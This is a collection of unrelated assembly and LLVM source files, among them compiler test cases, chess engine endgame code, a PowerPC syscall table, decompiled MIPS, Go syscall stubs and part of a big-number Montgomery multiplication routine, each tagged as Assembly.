%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add2
store i32 %add, i32* %arrayidx3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx4, align 4
ret i32 %7
}
| {
"language": "Assembly"
} |
macro GetKeys Wp, Wn, Wb, Wr, Wq, Bp, Bn, Bb, Br, Bq
ldr x0, [x28, 8*(64*King + 0)]
ldr x1, [x29, 8*(64*King + 0)]
eor x1, x1, x0
mov x2, x1
picnt = 0
repeat Wp
ldr x0, [x28, 8*(64*Pawn + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Pawn + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bp
ldr x0, [x29, 8*(64*Pawn + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Pawn + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wn
ldr x0, [x28, 8*(64*Knight + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Knight + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bn
ldr x0, [x29, 8*(64*Knight + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Knight + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wb
ldr x0, [x28, 8*(64*Bishop + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Bishop + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bb
ldr x0, [x29, 8*(64*Bishop + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Bishop + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wr
ldr x0, [x28, 8*(64*Rook + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Rook + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Br
ldr x0, [x29, 8*(64*Rook + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Rook + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wq
ldr x0, [x28, 8*(64*Queen + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Queen + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bq
ldr x0, [x29, 8*(64*Queen + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Queen + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
end macro
Endgame_Init:
; make sure all of our functions are registered with
; EndgameEval_Map
; EndgameScale_Map
; EndgameEval_FxnTable
; EndgameScale_FxnTable
stp x29, x30, [sp, -16]!
lea x28, Zobrist_Pieces
add x29, x28, 8*64*8
; eval
lea x21, EndgameEval_FxnTable
lea x15, EndgameEval_Map
; these endgame fxns correspond to a specific material config
; and are added to the map
GetKeys 1,0,0,0,0, 0,0,0,0,0
adr x0, EndgameEval_KPK
mov x14, EndgameEval_KPK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,2,0,0,0, 0,0,0,0,0
adr x0, EndgameEval_KNNK
mov x14, EndgameEval_KNNK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,1,1,0,0, 0,0,0,0,0
adr x0, EndgameEval_KBNK
mov x14, EndgameEval_KBNK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,1,0, 1,0,0,0,0
adr x0, EndgameEval_KRKP
mov x14, EndgameEval_KRKP_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,1,0, 0,0,1,0,0
adr x0, EndgameEval_KRKB
mov x14, EndgameEval_KRKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,1,0, 0,1,0,0,0
adr x0, EndgameEval_KRKN
mov x14, EndgameEval_KRKN_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,0,1, 1,0,0,0,0
adr x0, EndgameEval_KQKP
mov x14, EndgameEval_KQKP_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,0,1, 0,0,0,1,0
adr x0, EndgameEval_KQKR
mov x14, EndgameEval_KQKR_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
; these endgame fxns correspond to many material config
; and are not added to the map
adr x0, EndgameEval_KXK
mov x14, EndgameEval_KXK_index
str x0, [x21, x14, lsl 3]
; scale
lea x21, EndgameScale_FxnTable
lea x15, EndgameScale_Map
; these endgame fxns correspond to a specific material config
; and are added to the map
GetKeys 1,1,0,0,0, 0,0,0,0,0
adr x0, EndgameScale_KNPK
mov x14, EndgameScale_KNPK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,1,0,0,0, 0,0,1,0,0
adr x0, EndgameScale_KNPKB
mov x14, EndgameScale_KNPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,0,1,0, 0,0,0,1,0
adr x0, EndgameScale_KRPKR
mov x14, EndgameScale_KRPKR_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,0,1,0, 0,0,1,0,0
adr x0, EndgameScale_KRPKB
mov x14, EndgameScale_KRPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,1,0,0, 0,0,1,0,0
adr x0, EndgameScale_KBPKB
mov x14, EndgameScale_KBPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,1,0,0, 0,1,0,0,0
adr x0, EndgameScale_KBPKN
mov x14, EndgameScale_KBPKN_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 2,0,1,0,0, 0,0,1,0,0
adr x0, EndgameScale_KBPPKB
mov x14, EndgameScale_KBPPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 2,0,0,1,0, 1,0,0,1,0
adr x0, EndgameScale_KRPPKRP
mov x14, EndgameScale_KRPPKRP_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
; these endgame fxns correspond to many material config except KPKP
; and are not added to the map
adr x0, EndgameScale_KBPsK
mov x14, EndgameScale_KBPsK_index
str x0, [x21, x14, lsl 3]
adr x0, EndgameScale_KQKRPs
mov x14, EndgameScale_KQKRPs_index
str x0, [x21, x14, lsl 3]
adr x0, EndgameScale_KPsK
mov x14, EndgameScale_KPsK_index
str x0, [x21, x14, lsl 3]
adr x0, EndgameScale_KPKP
mov x14, EndgameScale_KPKP_index
str x0, [x21, x14, lsl 3]
lea x0, PushToEdges
adr x1, .PushToEdges
mov x2, 64
bl MemoryCopy
lea x0, PushToCorners
adr x1, .PushToCorners
mov x2, 64
bl MemoryCopy
lea x0, PushClose
adr x1, .PushClose
mov x2, 8
bl MemoryCopy
lea x0, PushAway
adr x1, .PushAway
mov x2, 8
bl MemoryCopy
ldp x29, x30, [sp], 16
ret
.PushToEdges:
db 100, 90, 80, 70, 70, 80, 90, 100
db 90, 70, 60, 50, 50, 60, 70, 90
db 80, 60, 40, 30, 30, 40, 60, 80
db 70, 50, 30, 20, 20, 30, 50, 70
db 70, 50, 30, 20, 20, 30, 50, 70
db 80, 60, 40, 30, 30, 40, 60, 80
db 90, 70, 60, 50, 50, 60, 70, 90
db 100, 90, 80, 70, 70, 80, 90, 100
.PushToCorners:
db 200, 190, 180, 170, 160, 150, 140, 130
db 190, 180, 170, 160, 150, 140, 130, 140
db 180, 170, 155, 140, 140, 125, 140, 150
db 170, 160, 140, 120, 110, 140, 150, 160
db 160, 150, 140, 110, 120, 140, 160, 170
db 150, 140, 125, 140, 140, 155, 170, 180
db 140, 130, 140, 150, 160, 170, 180, 190
db 130, 140, 150, 160, 170, 180, 190, 200
.PushClose:
db 0, 0, 100, 80, 60, 40, 20, 10
.PushAway:
db 0, 5, 20, 40, 60, 80, 90, 100
.Map_Insert:
; in: x1 hash with strongside=0
; x2 hash with strongside=1 (material flipped)
; x14 index of fxn
; x15 address EndgameEval_Map or EndgameScale_Map
; we simply insert the two entries x1 and x2 into the assumed
; sorted array of EndgameMapEntry structs, sorted by key
stp x29, x30, [sp, -16]!
add x14, x14, x14
stp x2, x14, [sp, -16]!
bl .Insert
ldp x1, x14, [sp], 16
add x14, x14, 1
bl .Insert
ldp x29, x30, [sp], 16
ret
.Insert:
; in: x1 key to insert
; x14 entry
sub x4, x15, sizeof.EndgameMapEntry
.Next:
ldp x0, x2, [x4, sizeof.EndgameMapEntry]!
cbz x2, .AtEnd
cmp x1, x0
bhi .Next
.Found:
ldp x0, x2, [x4]
.AtEnd:
stp x1, x14, [x4], sizeof.EndgameMapEntry
mov x1, x0
mov x14, x2
cbnz x2, .Found
ret
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -mtriple=x86_64-unknown-unknown -mcpu=btver2 -iterations=1 -resource-pressure=0 -timeline < %s | FileCheck %s
imull %esi
imull (%rdi)
# The second integer multiply can start at cycle 2 because the implicit reads
# can start after the load operand is evaluated.
# CHECK: Iterations: 1
# CHECK-NEXT: Instructions: 2
# CHECK-NEXT: Total Cycles: 10
# CHECK-NEXT: Total uOps: 4
# CHECK: Dispatch Width: 2
# CHECK-NEXT: uOps Per Cycle: 0.40
# CHECK-NEXT: IPC: 0.20
# CHECK-NEXT: Block RThroughput: 2.0
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 2 3 1.00 imull %esi
# CHECK-NEXT: 2 6 1.00 * imull (%rdi)
# CHECK: Timeline view:
# CHECK-NEXT: Index 0123456789
# CHECK: [0,0] DeeeER . imull %esi
# CHECK-NEXT: [0,1] .DeeeeeeER imull (%rdi)
# CHECK: Average Wait times (based on the timeline view):
# CHECK-NEXT: [0]: Executions
# CHECK-NEXT: [1]: Average time spent waiting in a scheduler's queue
# CHECK-NEXT: [2]: Average time spent waiting in a scheduler's queue while ready
# CHECK-NEXT: [3]: Average time elapsed from WB until retire stage
# CHECK: [0] [1] [2] [3]
# CHECK-NEXT: 0. 1 1.0 1.0 0.0 imull %esi
# CHECK-NEXT: 1. 1 1.0 1.0 0.0 imull (%rdi)
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -march=aarch64 -mcpu=cyclone -resource-pressure=false < %s | FileCheck %s
ldr x7, [x1, #8]
ldr x6, [x1, x2]
ldr x4, [x1, x2, sxtx]
# CHECK: Iterations: 100
# CHECK-NEXT: Instructions: 300
# CHECK-NEXT: Total Cycles: 157
# CHECK-NEXT: Total uOps: 500
# CHECK: Dispatch Width: 6
# CHECK-NEXT: uOps Per Cycle: 3.18
# CHECK-NEXT: IPC: 1.91
# CHECK-NEXT: Block RThroughput: 1.5
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 1 4 0.50 * ldr x7, [x1, #8]
# CHECK-NEXT: 2 5 0.50 * ldr x6, [x1, x2]
# CHECK-NEXT: 2 5 0.50 * ldr x4, [x1, x2, sxtx]
| {
"language": "Assembly"
} |
; RUN: opt -sccp -S < %s | FileCheck %s
target datalayout = "e-p:32:32:32-i1:8:8-i8:8:8-i16:16:16-i32:32:32-i64:32:64-f32:32:32-f64:32:64-v64:64:64-v128:128:128-a0:0:64-f80:128:128-n8:16:32-S128"
; CHECK: store volatile <2 x i64> zeroinitializer, <2 x i64>* %p
; rdar://11324230
define void @foo(<2 x i64>* %p) nounwind {
entry:
br label %while.body.i
while.body.i: ; preds = %while.body.i, %entry
%vWorkExponent.i.033 = phi <4 x i32> [ %sub.i.i, %while.body.i ], [ <i32 939524096, i32 939524096, i32 939524096, i32 939524096>, %entry ]
%sub.i.i = add <4 x i32> %vWorkExponent.i.033, <i32 -8388608, i32 -8388608, i32 -8388608, i32 -8388608>
%0 = bitcast <4 x i32> %sub.i.i to <2 x i64>
%and.i119.i = and <2 x i64> %0, zeroinitializer
store volatile <2 x i64> %and.i119.i, <2 x i64>* %p
br label %while.body.i
}
| {
"language": "Assembly"
} |
; RUN: llvm-as %s -o %t.o
; RUN: %gold -plugin %llvmshlibdir/LLVMgold%shlibext \
; RUN: -m elf_x86_64 --plugin-opt=emit-asm \
; RUN: -shared %t.o -o %t2.s
; RUN: FileCheck --input-file %t2.s %s
; RUN: %gold -plugin %llvmshlibdir/LLVMgold%shlibext \
; RUN: -m elf_x86_64 --plugin-opt=emit-asm --plugin-opt=lto-partitions=2\
; RUN: -shared %t.o -o %t2.s
; RUN: cat %t2.s %t2.s1 > %t3.s
; RUN: FileCheck --input-file %t3.s %s
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
; CHECK-DAG: f1:
define void @f1() {
ret void
}
; CHECK-DAG: f2:
define void @f2() {
ret void
}
| {
"language": "Assembly"
} |
/*
* This file contains the table of syscall-handling functions.
* Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
*
* Largely rewritten by Cort Dougan (cort@cs.nmt.edu)
* and Paul Mackerras.
*
* Adapted for iSeries by Mike Corrigan (mikejc@us.ibm.com)
* PPC64 updates by Dave Engebretsen (engebret@us.ibm.com)
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*/
#include <asm/ppc_asm.h>
#ifdef CONFIG_PPC64
#define SYSCALL(func) .llong .sys_##func,.sys_##func
#define COMPAT_SYS(func) .llong .sys_##func,.compat_sys_##func
#define PPC_SYS(func) .llong .ppc_##func,.ppc_##func
#define OLDSYS(func) .llong .sys_ni_syscall,.sys_ni_syscall
#define SYS32ONLY(func) .llong .sys_ni_syscall,.compat_sys_##func
#define SYSX(f, f3264, f32) .llong .f,.f3264
#else
#define SYSCALL(func) .long sys_##func
#define COMPAT_SYS(func) .long sys_##func
#define PPC_SYS(func) .long ppc_##func
#define OLDSYS(func) .long sys_##func
#define SYS32ONLY(func) .long sys_##func
#define SYSX(f, f3264, f32) .long f32
#endif
#define SYSCALL_SPU(func) SYSCALL(func)
#define COMPAT_SYS_SPU(func) COMPAT_SYS(func)
#define PPC_SYS_SPU(func) PPC_SYS(func)
#define SYSX_SPU(f, f3264, f32) SYSX(f, f3264, f32)
#ifdef CONFIG_PPC64
#define sys_sigpending sys_ni_syscall
#define sys_old_getrlimit sys_ni_syscall
.p2align 3
#endif
_GLOBAL(sys_call_table)
#include <asm/systbl.h>
| {
"language": "Assembly"
} |
RUN: llvm-dwarfdump -v %p/Inputs/dwarfdump-dwp.x86_64.o | FileCheck %s
; Testing the following simple dwp file:
; a.cpp:
; struct foo { };
; foo a;
; b.cpp:
; struct bar { };
; bar b() {
; }
; CHECK-NOT: .debug_info contents:
; CHECK-LABEL: .debug_info.dwo contents:
; CHECK: Compile Unit
; Verify that the second CU uses the index for its abbrev offset
; CHECK: Compile Unit
; CHECK-SAME: abbr_offset = 0x0043
; CHECK: DW_TAG_compile_unit
; CHECK-NOT: DW_TAG
; CHECK: DW_AT_name {{.*}} "b.cpp"
; Verify that abbreviations are decoded using the abbrev offset in the index
; CHECK: DW_TAG_structure_type
; CHECK: DW_TAG_subprogram
; CHECK-LABEL: .debug_types.dwo contents:
; CHECK: Type Unit
; CHECK: DW_TAG_type_unit
; CHECK: DW_AT_stmt_list {{.*}}(0x00000000)
; CHECK: DW_TAG_structure_type
; CHECK: DW_AT_decl_file {{.*}} ("a.cpp")
; CHECK: Type Unit
; CHECK: DW_TAG_type_unit
; CHECK: DW_AT_stmt_list {{.*}}(0x00000000)
; CHECK: DW_TAG_structure_type
; CHECK: DW_AT_decl_file {{.*}} ("b.cpp")
; CHECK: .debug_cu_index contents:
; CHECK-NEXT: version = 2 slots = 16
; CHECK: Index Signature INFO ABBREV LINE STR_OFFSETS
; CHECK-NEXT: ----- ------------------ ------------------------ ------------------------ ------------------------ ------------------------
; CHECK-NEXT: 3 0xfef104c25502f092 [0x0000002d, 0x0000005f) [0x00000043, 0x0000008e) [0x0000001a, 0x00000034) [0x00000010, 0x00000024)
; CHECK-NEXT: 9 0x03c30756e2d45008 [0x00000000, 0x0000002d) [0x00000000, 0x00000043) [0x00000000, 0x0000001a) [0x00000000, 0x00000010)
; CHECK: .debug_tu_index contents:
; CHECK-NEXT: version = 2 slots = 16
; CHECK: Index Signature TYPES ABBREV LINE STR_OFFSETS
; CHECK-NEXT: ----- ------------------ ------------------------ ------------------------ ------------------------ ------------------------
; CHECK-NEXT: 9 0x1d02f3be30cc5688 [0x00000024, 0x00000048) [0x00000043, 0x0000008e) [0x0000001a, 0x00000034) [0x00000010, 0x00000024)
; CHECK-NEXT: 13 0x3875c0e21cda63fc [0x00000000, 0x00000024) [0x00000000, 0x00000043) [0x00000000, 0x0000001a) [0x00000000, 0x00000010)
; TODO: use the index section offset info to correctly dump strings in debug info
; TODO: use the index section offset info to correctly dump file names in debug info
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -basicaa -slp-vectorizer -S -mtriple=x86_64-unknown -mcpu=corei7-avx | FileCheck %s
%struct.complex = type { float, float }
define void @foo (%struct.complex* %A, %struct.complex* %B, %struct.complex* %Result) {
; CHECK-LABEL: @foo(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[TMP0:%.*]] = add i64 256, 0
; CHECK-NEXT: br label [[LOOP:%.*]]
; CHECK: loop:
; CHECK-NEXT: [[TMP1:%.*]] = phi i64 [ 0, [[ENTRY:%.*]] ], [ [[TMP20:%.*]], [[LOOP]] ]
; CHECK-NEXT: [[TMP2:%.*]] = phi float [ 0.000000e+00, [[ENTRY]] ], [ [[TMP19:%.*]], [[LOOP]] ]
; CHECK-NEXT: [[TMP3:%.*]] = phi float [ 0.000000e+00, [[ENTRY]] ], [ [[TMP18:%.*]], [[LOOP]] ]
; CHECK-NEXT: [[TMP4:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX:%.*]], %struct.complex* [[A:%.*]], i64 [[TMP1]], i32 0
; CHECK-NEXT: [[TMP5:%.*]] = load float, float* [[TMP4]], align 4
; CHECK-NEXT: [[TMP6:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[A]], i64 [[TMP1]], i32 1
; CHECK-NEXT: [[TMP7:%.*]] = load float, float* [[TMP6]], align 4
; CHECK-NEXT: [[TMP8:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[B:%.*]], i64 [[TMP1]], i32 0
; CHECK-NEXT: [[TMP9:%.*]] = load float, float* [[TMP8]], align 4
; CHECK-NEXT: [[TMP10:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[B]], i64 [[TMP1]], i32 1
; CHECK-NEXT: [[TMP11:%.*]] = load float, float* [[TMP10]], align 4
; CHECK-NEXT: [[TMP12:%.*]] = fmul float [[TMP5]], [[TMP9]]
; CHECK-NEXT: [[TMP13:%.*]] = fmul float [[TMP7]], [[TMP11]]
; CHECK-NEXT: [[TMP14:%.*]] = fsub float [[TMP12]], [[TMP13]]
; CHECK-NEXT: [[TMP15:%.*]] = fmul float [[TMP7]], [[TMP9]]
; CHECK-NEXT: [[TMP16:%.*]] = fmul float [[TMP5]], [[TMP11]]
; CHECK-NEXT: [[TMP17:%.*]] = fadd float [[TMP15]], [[TMP16]]
; CHECK-NEXT: [[TMP18]] = fadd float [[TMP3]], [[TMP14]]
; CHECK-NEXT: [[TMP19]] = fadd float [[TMP2]], [[TMP17]]
; CHECK-NEXT: [[TMP20]] = add nuw nsw i64 [[TMP1]], 1
; CHECK-NEXT: [[TMP21:%.*]] = icmp eq i64 [[TMP20]], [[TMP0]]
; CHECK-NEXT: br i1 [[TMP21]], label [[EXIT:%.*]], label [[LOOP]]
; CHECK: exit:
; CHECK-NEXT: [[TMP22:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[RESULT:%.*]], i32 0, i32 0
; CHECK-NEXT: store float [[TMP18]], float* [[TMP22]], align 4
; CHECK-NEXT: [[TMP23:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[RESULT]], i32 0, i32 1
; CHECK-NEXT: store float [[TMP19]], float* [[TMP23]], align 4
; CHECK-NEXT: ret void
;
entry:
%0 = add i64 256, 0
br label %loop
loop:
%1 = phi i64 [ 0, %entry ], [ %20, %loop ]
%2 = phi float [ 0.000000e+00, %entry ], [ %19, %loop ]
%3 = phi float [ 0.000000e+00, %entry ], [ %18, %loop ]
%4 = getelementptr inbounds %"struct.complex", %"struct.complex"* %A, i64 %1, i32 0
%5 = load float, float* %4, align 4
%6 = getelementptr inbounds %"struct.complex", %"struct.complex"* %A, i64 %1, i32 1
%7 = load float, float* %6, align 4
%8 = getelementptr inbounds %"struct.complex", %"struct.complex"* %B, i64 %1, i32 0
%9 = load float, float* %8, align 4
%10 = getelementptr inbounds %"struct.complex", %"struct.complex"* %B, i64 %1, i32 1
%11 = load float, float* %10, align 4
%12 = fmul float %5, %9
%13 = fmul float %7, %11
%14 = fsub float %12, %13
%15 = fmul float %7, %9
%16 = fmul float %5, %11
%17 = fadd float %15, %16
%18 = fadd float %3, %14
%19 = fadd float %2, %17
%20 = add nuw nsw i64 %1, 1
%21 = icmp eq i64 %20, %0
br i1 %21, label %exit, label %loop
exit:
%22 = getelementptr inbounds %"struct.complex", %"struct.complex"* %Result, i32 0, i32 0
store float %18, float* %22, align 4
%23 = getelementptr inbounds %"struct.complex", %"struct.complex"* %Result, i32 0, i32 1
store float %19, float* %23, align 4
ret void
}
| {
"language": "Assembly"
} |
glabel func_80AFEF5C
/* 00CAC 80AFEF5C 27BDFFE8 */ addiu $sp, $sp, 0xFFE8 ## $sp = FFFFFFE8
/* 00CB0 80AFEF60 AFBF0014 */ sw $ra, 0x0014($sp)
/* 00CB4 80AFEF64 240E0003 */ addiu $t6, $zero, 0x0003 ## $t6 = 00000003
/* 00CB8 80AFEF68 A08E02D4 */ sb $t6, 0x02D4($a0) ## 000002D4
/* 00CBC 80AFEF6C A48002CC */ sh $zero, 0x02CC($a0) ## 000002CC
/* 00CC0 80AFEF70 AFA40018 */ sw $a0, 0x0018($sp)
/* 00CC4 80AFEF74 0C2BF8AC */ jal func_80AFE2B0
/* 00CC8 80AFEF78 24050001 */ addiu $a1, $zero, 0x0001 ## $a1 = 00000001
/* 00CCC 80AFEF7C 8FA40018 */ lw $a0, 0x0018($sp)
/* 00CD0 80AFEF80 0C2BF8CE */ jal func_80AFE338
/* 00CD4 80AFEF84 24050001 */ addiu $a1, $zero, 0x0001 ## $a1 = 00000001
/* 00CD8 80AFEF88 8FBF0014 */ lw $ra, 0x0014($sp)
/* 00CDC 80AFEF8C 27BD0018 */ addiu $sp, $sp, 0x0018 ## $sp = 00000000
/* 00CE0 80AFEF90 03E00008 */ jr $ra
/* 00CE4 80AFEF94 00000000 */ nop
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for 386, OpenBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
.text
.globl bn_mul_mont
.type bn_mul_mont,@function
.align 16
bn_mul_mont:
testl $3,%r9d
jnz .Lmul_enter
cmpl $8,%r9d
jb .Lmul_enter
cmpq %rsi,%rdx
jne .Lmul4x_enter
testl $7,%r9d
jz .Lsqr8x_enter
jmp .Lmul4x_enter
.align 16
.Lmul_enter:
pushq %rbx
pushq %rbp
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movl %r9d,%r9d
leaq 2(%r9),%r10
movq %rsp,%r11
negq %r10
leaq (%rsp,%r10,8),%rsp
andq $-1024,%rsp
movq %r11,8(%rsp,%r9,8)
.Lmul_body:
movq %rdx,%r12
movq (%r8),%r8
movq (%r12),%rbx
movq (%rsi),%rax
xorq %r14,%r14
xorq %r15,%r15
movq %r8,%rbp
mulq %rbx
movq %rax,%r10
movq (%rcx),%rax
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq %rdx,%r13
leaq 1(%r15),%r15
jmp .L1st_enter
.align 16
.L1st:
addq %rax,%r13
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%r13
movq %r10,%r11
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
.L1st_enter:
mulq %rbx
addq %rax,%r11
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
leaq 1(%r15),%r15
movq %rdx,%r10
mulq %rbp
cmpq %r9,%r15
jne .L1st
addq %rax,%r13
movq (%rsi),%rax
adcq $0,%rdx
addq %r11,%r13
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
movq %r10,%r11
xorq %rdx,%rdx
addq %r11,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r9,8)
movq %rdx,(%rsp,%r9,8)
leaq 1(%r14),%r14
jmp .Louter
.align 16
.Louter:
movq (%r12,%r14,8),%rbx
xorq %r15,%r15
movq %r8,%rbp
movq (%rsp),%r10
mulq %rbx
addq %rax,%r10
movq (%rcx),%rax
adcq $0,%rdx
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq 8(%rsp),%r10
movq %rdx,%r13
leaq 1(%r15),%r15
jmp .Linner_enter
.align 16
.Linner:
addq %rax,%r13
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
movq (%rsp,%r15,8),%r10
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
.Linner_enter:
mulq %rbx
addq %rax,%r11
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
addq %r11,%r10
movq %rdx,%r11
adcq $0,%r11
leaq 1(%r15),%r15
mulq %rbp
cmpq %r9,%r15
jne .Linner
addq %rax,%r13
movq (%rsi),%rax
adcq $0,%rdx
addq %r10,%r13
movq (%rsp,%r15,8),%r10
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
xorq %rdx,%rdx
addq %r11,%r13
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r9,8)
movq %rdx,(%rsp,%r9,8)
leaq 1(%r14),%r14
cmpq %r9,%r14
jb .Louter
xorq %r14,%r14
movq (%rsp),%rax
leaq (%rsp),%rsi
movq %r9,%r15
jmp .Lsub
.align 16
.Lsub: sbbq (%rcx,%r14,8),%rax
movq %rax,(%rdi,%r14,8)
movq 8(%rsi,%r14,8),%rax
leaq 1(%r14),%r14
decq %r15
jnz .Lsub
sbbq $0,%rax
xorq %r14,%r14
andq %rax,%rsi
notq %rax
movq %rdi,%rcx
andq %rax,%rcx
movq %r9,%r15
orq %rcx,%rsi
.align 16
.Lcopy:
movq (%rsi,%r14,8),%rax
movq %r14,(%rsp,%r14,8)
movq %rax,(%rdi,%r14,8)
leaq 1(%r14),%r14
subq $1,%r15
jnz .Lcopy
movq 8(%rsp,%r9,8),%rsi
movq $1,%rax
movq (%rsi),%r15
movq 8(%rsi),%r14
movq 16(%rsi),%r13
movq 24(%rsi),%r12
movq 32(%rsi),%rbp
movq 40(%rsi),%rbx
leaq 48(%rsi),%rsp
.Lmul_epilogue:
.byte 0xf3,0xc3
.size bn_mul_mont,.-bn_mul_mont
.type bn_mul4x_mont,@function
.align 16
bn_mul4x_mont:
.Lmul4x_enter:
pushq %rbx
pushq %rbp
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movl %r9d,%r9d
leaq 4(%r9),%r10
movq %rsp,%r11
negq %r10
leaq (%rsp,%r10,8),%rsp
andq $-1024,%rsp
movq %r11,8(%rsp,%r9,8)
.Lmul4x_body:
movq %rdi,16(%rsp,%r9,8)
movq %rdx,%r12
movq (%r8),%r8
movq (%r12),%rbx
movq (%rsi),%rax
xorq %r14,%r14
xorq %r15,%r15
movq %r8,%rbp
mulq %rbx
movq %rax,%r10
